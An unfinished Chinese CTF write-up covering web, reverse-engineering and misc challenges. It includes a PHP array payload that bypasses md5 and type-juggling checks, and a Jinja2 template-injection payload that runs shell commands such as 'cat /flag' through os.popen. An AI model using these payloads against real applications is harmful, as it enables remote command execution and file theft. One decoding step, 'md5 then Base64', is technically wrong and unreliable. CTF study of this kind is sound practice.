还没写完.......
有错误见谅...............................
参考原比赛wp:腾讯文档
WEB
题目一:一行代码的签到
题目源码:
<?php
//只有一行的签到
echo !(!(include "flag.php")||(!error_reporting(0))||!isset($_GET['BYE'])||!isset($_GET['HELLO'])||($_GET['BYE']==2021)||!(intval($_GET['BYE'][0])==2021)||$_GET['HELLO']==$_GET['BYE']||!(md5($_GET['HELLO'])==md5($_GET['BYE'])))?$flag:str_repeat(highlight_file(__FILE__), 0);
知识点:
intval函数特性:intval() 函数用于获取变量的整数值
md5数组绕过:md5不能加密数组,传入数组会报错,但会继续执行并且返回结果为null
弱类型比较(==),只判断内容是否相等,如果是字符串类型,则转换成数值型后进行判断
三目运算符:echo !()?xxx:yyy,若为true则用echo xxx,若为false则echo yyy.
||连接各个条件
分析
整个条件
!(!(include "flag.php")||(!error_reporting(0))||!isset($_GET['BYE'])||!isset($_GET['HELLO'])||($_GET['BYE']==2021)||!(intval($_GET['BYE'][0])==2021)||$_GET['HELLO']==$_GET['BYE']||!(md5($_GET['HELLO'])==md5($_GET['BYE'])))
因为需要整个条件为真才输出flag,可以看见括号最前面加上了!,就需要括号里面的条件为假
1.($_GET['BYE']==2021)==>BYE不能为2021
2.!(intval($_GET['BYE'][0])==2021)==>BYE的整数值为2021
3.$_GET['HELLO']==$_GET['BYE']==>HELLO和BYE变量不能相等
4.!(md5($_GET['HELLO'])==md5($_GET['BYE']))==>在HELLO和BYE变量后加上[],变成数组,即null=null,绕过
payload:
?HELLO[]=2021A&BYE[]=2021a
题目二 e4zy_flask
Hint:/admin?name=1 https://xz.aliyun.com/t/8029#toc-8
进入页面
转到admin页面
/admin
get传参发现可以ssti
/admin?name=49
看看根目录
admin/?name={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}}
发现有flag
?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20/flag%27).read()%20}}
flag
flag{SST1_YoU_kNow_1t_A1way5_5O_Easy}
题目三 baby_SQL
题目四 TP_serialize
REVERSE
题目一 RE Check In
IDA打开flag.exe,发现main函数里有串字符串
BASE64解码得到flag
题目二 Easy RE
题目三 Dynamic Reverse
MISC
题目一 享受美妙的音乐吧
解压文件得到一个wav音频和一个压缩包,压缩包有密码,先看音频
放到Audacity看,没发现什么
然后发现是sstv转图片,先切换输出设备,再打开sstv转图片
发现图片上的字“我磕的CP是最甜的!”,是压缩包密码,解压出音频
听了发现是一首歌,放到Audacity看,同样没啥东西
那就应该是隐藏了文件,找下看 ,DeepSound找到里面有个txt
打开看到最后有个零,而且列数很多,应该是零宽隐写
用解密网址解密得到flag
题目二 超简单
用的ps拼接二维码,扫出来得到一串字符
V20xNGFGb3pkSE5qTVRoNFpFWTVlbVJZUW14amJEbDZZVmN4ZDJKSFZTOW1VVDA5
先md5,再BASE64,得到flagflag{ls_1t_super_simple?}
题目三 来个套餐
解压文件,得到一个hint.txt和一个带密码的压缩包
看看hint.txt,发现可能是爆破压缩包的字典,试试
爆破成功,解压压缩包
发现是培根密码
解密大写解压错误,小写解压成功,tiersxqxyhdcbsnervfy
解压
Ook解密
解压得到一张图
放到010里看
看属性,发现flag:flag{He110_everyone_1m#tired@of_Amway}
题目四 今天也是爱阿瑶的一天呀
解压文件,得到两张图,一个hint.txt,提示了金光瑶的生日,身高,最下面还提示带单位